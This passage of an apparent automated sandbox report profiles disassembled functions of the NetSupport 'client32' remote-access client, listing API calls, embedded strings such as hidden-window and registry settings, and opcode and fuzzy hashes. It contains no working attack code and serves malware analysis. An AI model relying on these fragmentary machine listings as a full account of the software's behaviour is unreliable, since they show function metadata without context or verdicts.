                                                                              • DestroyMenu.USER32(?,?,00000000,00000000,00000102,?,?,?,00000000), ref: 11023AA3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Menu$Window$Item$CheckShow$BringDestroyIconicLoadMessagePostRect
                                                                              • String ID: AddToJournal$Chat
                                                                              • API String ID: 693070851-2976406578
                                                                              • Opcode ID: 4e8affa197535ad0660103244a90f227890d3a0ada2779ccdef05f8d718aa204
                                                                              • Instruction ID: 808c1e48a155f27d2b3c0586fadc3707d2cf985dccefb9094def5a9ab05a8e38
                                                                              • Opcode Fuzzy Hash: 4e8affa197535ad0660103244a90f227890d3a0ada2779ccdef05f8d718aa204
                                                                              • Instruction Fuzzy Hash: 58A10334F44616ABDB08CF64CC85FAEB3E9AB8C704F50452DE6569F6C0DBB4A900CB95
                                                                              APIs
                                                                                • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
                                                                                • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                • Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • GetLocalTime.KERNEL32(?), ref: 110A1778
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastLocalMessageProcessTime__strdup_freewsprintfwvsprintf
                                                                              • String ID: %s\$%s\%s$%s_$CLASSID=$IsA()$LESSON=$[JNL] MakeFileName ret %s$\/:*?"<>|$_%04d_%02d_%02d_%02d%02d$_%s$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                              • API String ID: 2014016395-1677429133
                                                                              • Opcode ID: f40b352dcf41bf990ef8532e9d61be92d2988391912dd2b6e0b8644578a58059
                                                                              • Instruction ID: aef08c5c19416ca6c78363d8fb1b9fc7de7af93cef0e20b47086b6b370679a0b
                                                                              • Opcode Fuzzy Hash: f40b352dcf41bf990ef8532e9d61be92d2988391912dd2b6e0b8644578a58059
                                                                              • Instruction Fuzzy Hash: 44B1AF79E00229ABDB15DBA4DD41FEDB7F5AF59388F0441D4E80A67280EB307B44CEA5
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,11139C95,00000000), ref: 11131428
                                                                              • ShowWindow.USER32(00000000,00000000,?,11139C95,00000000), ref: 11131457
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLastShowWindow
                                                                              • String ID: #32770$Client$Hidden$StatusMode$UI.CPP$gUI.hidden_window
                                                                              • API String ID: 3252650109-4091810678
                                                                              • Opcode ID: 0ae299210a7d0d5a262dbccdfbf7f866bd70b7d9559bf6e9f26038e806d2e655
                                                                              • Instruction ID: 1b40a51cdbaebc86ba70b46d463032212dc909346aab7ab50ce078dfded898e8
                                                                              • Opcode Fuzzy Hash: 0ae299210a7d0d5a262dbccdfbf7f866bd70b7d9559bf6e9f26038e806d2e655
                                                                              • Instruction Fuzzy Hash: 2161D571B84325ABE711CF90CC85F69F774E784B29F104129F625AB2C4EBB56940CB84
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(Wtsapi32.dll,EE49F673,1102E747,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110F732D
                                                                              • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7372
                                                                              • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73C3
                                                                              • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F73D8
                                                                              • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73FD
                                                                              • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7412
                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7423
                                                                              • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7440
                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7451
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastLibraryProc$Free$Load
                                                                              • String ID: WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                              • API String ID: 2188719708-2019804778
                                                                              • Opcode ID: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                              • Instruction ID: 4e6ae02227e90de241cbe6e1e3770e4d50810e342ffe13a4e1f679076b39a632
                                                                              • Opcode Fuzzy Hash: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                              • Instruction Fuzzy Hash: 49511371D4121AEFDB14DFD9D9C5AAEFBF5FB48300F51846AE829E3600DB34A9018B61
                                                                              APIs
                                                                                • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                              • GetDlgItem.USER32(?,00000472), ref: 1103F557
                                                                                • Part of subcall function 11160450: SetPropA.USER32(00000000,00000000,00000000), ref: 1116046E
                                                                                • Part of subcall function 11160450: SetWindowLongA.USER32(00000000,000000FC,1115FE60), ref: 1116047F
                                                                              • wsprintfA.USER32 ref: 1103F5D1
                                                                              • GetSystemMenu.USER32(?,00000000), ref: 1103F5F6
                                                                              • EnableMenuItem.USER32(00000000,0000F060,00000002), ref: 1103F604
                                                                              • SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000003), ref: 1103F663
                                                                              • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1103F692
                                                                              • MessageBeep.USER32(00000000), ref: 1103F696
                                                                                • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$Item$FolderMenuPath$BeepEnableFileLongMessageModuleNameObjectPropRectShowSystemTextwsprintf
                                                                              • String ID: %sblockapp.jpg$BlockedAppFile$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 1300213680-78349004
                                                                              • Opcode ID: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
                                                                              • Instruction ID: 6f07d7162ed8c172429d77206b5c6f615c65d6256772802cbf9fe3e1e633a07a
                                                                              • Opcode Fuzzy Hash: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
                                                                              • Instruction Fuzzy Hash: 0641EE757403197FD720DBA4CC86FDAF3A4AB48B08F104568F3666B5C0DAB0B980CB55
                                                                              APIs
                                                                              • wsprintfA.USER32 ref: 1105F251
                                                                              • wsprintfA.USER32 ref: 1105F265
                                                                                • Part of subcall function 110ED570: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105F29C,?,00000000,?,00000000,75A78400,?,?,1105F29C,80000001), ref: 110ED59B
                                                                                • Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                              • wsprintfA.USER32 ref: 1105F5D6
                                                                                • Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 110ED1CB
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$ExitProcess$CreateEnumErrorLastMessageOpen_strrchr
                                                                              • String ID: %s\%s$ConfigList$General\ProductId$IsA()$NetSupport School$NetSupport School Pro$Software\Classes\VirtualStore\MACHINE\%s\%s\ConfigList$Software\NetSupport Ltd$Software\Productive Computer Insight$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf
                                                                              • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 110695BD
                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110695D3
                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110695E9
                                                                              • Sleep.KERNEL32(00000064,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 1106961D
                                                                              • GetTickCount.KERNEL32 ref: 11069621
                                                                              • wsprintfA.USER32 ref: 11069651
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110696A4
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110696A7
                                                                              Strings
                                                                              • idata->n_connections=%d, xrefs: 1106964B
                                                                              • CloseTransports slept for %u ms, xrefs: 11069630
                                                                              • ..\ctl32\Connect.cpp, xrefs: 11069661
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$CountEnterLeaveTick$Sleepwsprintf
                                                                              • String ID: ..\ctl32\Connect.cpp$CloseTransports slept for %u ms$idata->n_connections=%d
                                                                              APIs
                                                                                • Part of subcall function 110EE230: LocalAlloc.KERNEL32(00000040,00000014,?,1100D6AF,?), ref: 110EE240
                                                                                • Part of subcall function 110EE230: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D6AF,?), ref: 110EE252
                                                                                • Part of subcall function 110EE230: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D6AF,?), ref: 110EE264
                                                                              • CreateEventA.KERNEL32(?,00000000,00000000,00000000), ref: 1100D6C7
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1100D6E0
                                                                              • _strrchr.LIBCMT ref: 1100D6EF
                                                                              • GetCurrentProcessId.KERNEL32 ref: 1100D6FF
                                                                              • wsprintfA.USER32 ref: 1100D720
                                                                              • _memset.LIBCMT ref: 1100D731
                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,04000000,00000000,00000000,?,?), ref: 1100D769
                                                                              • CloseHandle.KERNEL32(?,00000000), ref: 1100D781
                                                                              • CloseHandle.KERNEL32(?), ref: 1100D78A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCreateDescriptorHandleProcessSecurity$AllocCurrentDaclEventFileInitializeLocalModuleName_memset_strrchrwsprintf
                                                                              • String ID: %sNSSilence.exe %u %u$D
                                                                              APIs
                                                                              • CreateSolidBrush.GDI32(?), ref: 1100306D
                                                                              • GetStockObject.GDI32(00000007), ref: 11003089
                                                                              • SelectObject.GDI32(?,00000000), ref: 1100309A
                                                                              • SelectObject.GDI32(?,?), ref: 110030A7
                                                                              • InflateRect.USER32(?,000000FC,000000FF), ref: 110030D8
                                                                              • GetSysColor.USER32(00000004), ref: 110030EB
                                                                              • SetBkColor.GDI32(?,00000000), ref: 110030F6
                                                                              • Rectangle.GDI32(?,?,?,?,?), ref: 11003110
                                                                              • SelectObject.GDI32(?,?), ref: 1100311E
                                                                              • SelectObject.GDI32(?,?), ref: 11003128
                                                                              • DeleteObject.GDI32(?), ref: 1100312E
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Object$Select$Color$BrushCreateDeleteInflateRectRectangleSolidStock
                                                                              • String ID:
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • std::exception::exception.LIBCMT ref: 1113F7AB
                                                                              • __CxxThrowException@8.LIBCMT ref: 1113F7C0
                                                                              • SetPropA.USER32(?,?,00000000), ref: 1113F84E
                                                                              • GetPropA.USER32(?), ref: 1113F85D
                                                                              • wsprintfA.USER32 ref: 1113F88F
                                                                              • RemovePropA.USER32(?), ref: 1113F8C1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Prop$wsprintf$Exception@8RemoveThrow_malloc_memsetstd::exception::exception
                                                                              • String ID: NSMStatsWindow::m_aProp$UI.CPP$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _strtok$_malloc
                                                                              • String ID: *extra_bytes$..\ctl32\AUDIO.CPP$Audio$Send EV_CONFIGSET from %s@%d$nbytes <= sizeof (extra_bytes)
                                                                              APIs
                                                                              • CountClipboardFormats.USER32 ref: 11033091
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                              • EnumClipboardFormats.USER32(00000000), ref: 110330F6
                                                                              • GetLastError.KERNEL32 ref: 110331BF
                                                                              • GetLastError.KERNEL32(00000000), ref: 110331C2
                                                                              • IsClipboardFormatAvailable.USER32(00000008), ref: 11033225
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: ClipboardErrorLast$Formats$AvailableCountEnumExitFormatMessageProcess_malloc_memsetwsprintf
                                                                              • String ID: ..\ctl32\clipbrd.cpp$Error enumclip, e=%d, x%x$ppFormats
                                                                              • API String ID: 3210887762-597690070
                                                                              • Opcode ID: 783cfaeac01b76432846342580ba7980eef49404acbb133f97720025ffc7a27a
                                                                              • Instruction ID: b804fa4b4600a3d7d633b164336aeb5b10f9113d5bb37ecf981567cf99ca6661
                                                                              • Opcode Fuzzy Hash: 783cfaeac01b76432846342580ba7980eef49404acbb133f97720025ffc7a27a
                                                                              • Instruction Fuzzy Hash: 02518B75E1822A8FDB10CFA8C8C479DFBB4EB85319F1041AAD859AB341EB719944CF90
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(111EE294,EE49F673,?,?,?,?,00000000,11181BDE), ref: 110535C4
                                                                              • LeaveCriticalSection.KERNEL32(111EE294,00000000,?,?,?,?,00000000,11181BDE), ref: 11053789
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • std::exception::exception.LIBCMT ref: 11053635
                                                                              • __CxxThrowException@8.LIBCMT ref: 1105364A
                                                                              • GetTickCount.KERNEL32 ref: 11053660
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 11053747
                                                                              • LeaveCriticalSection.KERNEL32(111EE294,list<T> too long,00000000,?,?,?,?,00000000,11181BDE), ref: 11053751
                                                                                • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: CriticalSection$Leave$CountEnterException@8ThrowTickXinvalid_argument_free_malloc_memsetstd::_std::exception::exceptionwsprintf
                                                                              • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$list<T> too long
                                                                              • API String ID: 2238969640-1197860701
                                                                              • Opcode ID: 56db25419c0e47adced9616d36e05b27263c0d593e28ae4636820008f3c37c9f
                                                                              • Instruction ID: 9fd56e3a4776fcf28e1c6ce8a1981ca07dec16432dee4cc0167aa7d7c32ba94c
                                                                              • Opcode Fuzzy Hash: 56db25419c0e47adced9616d36e05b27263c0d593e28ae4636820008f3c37c9f
                                                                              • Instruction Fuzzy Hash: 31517179E062659FDB45CFA4C984AADFBA4FF09348F008169E8159B344F731A904CBA5
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • GetOEMCP.KERNEL32(View,Cachesize,00000400,00000000,76EDC3F0,00000000), ref: 11065525
                                                                                • Part of subcall function 11064880: _strtok.LIBCMT ref: 110648C0
                                                                                • Part of subcall function 11064880: _strtok.LIBCMT ref: 110648F0
                                                                              • GetDC.USER32(00000000), ref: 11065558
                                                                              • GetDeviceCaps.GDI32(00000000,0000000E), ref: 11065563
                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 1106556E
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 110655B9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: CapsDevice_strtok$Release__wcstoi64
                                                                              • String ID: 932, 949, 1361, 874, 862$Cachesize$Codepage$DBCS$View
                                                                              • API String ID: 3945178471-2526036698
                                                                              • Opcode ID: 058c2aae16d643b31adc47a1744bed462daca89727d2630be5973e582d58aa57
                                                                              • Instruction ID: 682317bc02e2a30c69588dc0a9c96f0ce4cbb9861371b6ad8b8e837dbdf19ace
                                                                              • Opcode Fuzzy Hash: 058c2aae16d643b31adc47a1744bed462daca89727d2630be5973e582d58aa57
                                                                              • Instruction Fuzzy Hash: DA21497AE002246BE3149F75CDC4BA9FB98FB08354F014565F969EB280D775A940C7D0
                                                                              APIs
                                                                              • GetMenuItemCount.USER32 ref: 1101F2B5
                                                                              • _memset.LIBCMT ref: 1101F2D8
                                                                              • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1101F2F6
                                                                              • _free.LIBCMT ref: 1101F305
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              • _free.LIBCMT ref: 1101F30E
                                                                              • DeleteObject.GDI32(00000000), ref: 1101F32D
                                                                              • DeleteObject.GDI32(00000000), ref: 1101F33B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: DeleteItemMenuObject_free$CountErrorFreeHeapInfoLast_memset
                                                                              • String ID: $0$UndoOwnerDraw
                                                                              • API String ID: 4094458939-790594647
                                                                              • Opcode ID: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
                                                                              • Instruction ID: 9f4c9540ed3e85911a06978235dbefa5e19a2329fc37d196683f21109e2371eb
                                                                              • Opcode Fuzzy Hash: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
                                                                              • Instruction Fuzzy Hash: 16119671E162299BDB04DFE49C85B9DFBECBB18318F000069E814D7244E674A5108B91
                                                                              APIs
                                                                              • wsprintfA.USER32 ref: 1106F737
                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F788
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 1106F7A8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeavewsprintf
                                                                              • String ID: %s:%d$(null)$ListenPort$NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s$Port$TCPIP$UseNCS$tracerecv
                                                                              • API String ID: 3005300677-3496508882
                                                                              • Opcode ID: 528d664af790432cc8ca1395220602a174b3715dc91bad2e9284cb29b95c4820
                                                                              • Instruction ID: f86a0a3523b45ae2aa4ac8696085f91b0c00e2f9513f1a57450127c273c63767
                                                                              • Opcode Fuzzy Hash: 528d664af790432cc8ca1395220602a174b3715dc91bad2e9284cb29b95c4820
                                                                              • Instruction Fuzzy Hash: 17B19F79E003169FDB10CF64CC90FAAB7B9AF89708F50419DE909A7241EB75AD41CF62
                                                                              APIs
                                                                              • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,11180365,00000000,00000000,EE49F673,00000000,?,00000000), ref: 110613A4
                                                                              • _malloc.LIBCMT ref: 110613EB
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,000000FF,?,EE49F673,00000000), ref: 1106142B
                                                                              • RegEnumValueA.ADVAPI32(?,00000000,?,00000100,00000000,?,000000FF,?), ref: 11061492
                                                                              • _free.LIBCMT ref: 110614A4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
                                                                              • String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
                                                                              • API String ID: 999355418-161875503
                                                                              • Opcode ID: 1fd6cffb0b6506106fbd2de026ba492dd64e6340ee49c1c0b4f88686c2a5e216
                                                                              • Instruction ID: 6cc8e5caf6a1957f468abfb3494a260dc46a483def11051c8948769c459486e3
                                                                              • Opcode Fuzzy Hash: 1fd6cffb0b6506106fbd2de026ba492dd64e6340ee49c1c0b4f88686c2a5e216
                                                                              • Instruction Fuzzy Hash: 78A1A175A007469FE721CF64C880BABFBF8AF49304F144A5DE59697680E771F508CBA1
                                                                              APIs
                                                                              • IsWindow.USER32(00000000), ref: 1104147B
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • SendMessageTimeoutA.USER32(?,0000004A,00040414,?,00000002,00002710,?), ref: 11041670
                                                                              • _free.LIBCMT ref: 11041677
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessageSendTimeoutWindow__wcstoi64_free
                                                                              • String ID: Client$DisableJournalMenu$IsA()$Journal status( bNoMenu = %d, gpJournal = %x, %d, %d) bVistaUI %d$SendJournalStatustoSTUI(%d, %d, %d, %d)$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                              • API String ID: 1897251511-2352888828
                                                                              • Opcode ID: fa5a56d3959a27f69506f65d8ccf5def50a2be3eef365412e5d35b6d21c3e654
                                                                              • Instruction ID: 7d7d201ace8770d3ab851aba43ef7aa7a0e05de8b0dcb1a0fb6fb2d6540d47c3
                                                                              • Opcode Fuzzy Hash: fa5a56d3959a27f69506f65d8ccf5def50a2be3eef365412e5d35b6d21c3e654
                                                                              • Instruction Fuzzy Hash: 37717DB5F0021AAFDB04DFD4CCC0AEEF7B5AF48304F244279E516A7685E631A905CBA1
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 110513F9
                                                                              • CloseHandle.KERNEL32(?,Client,UserAcknowledge,00000000,00000000), ref: 110514DB
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
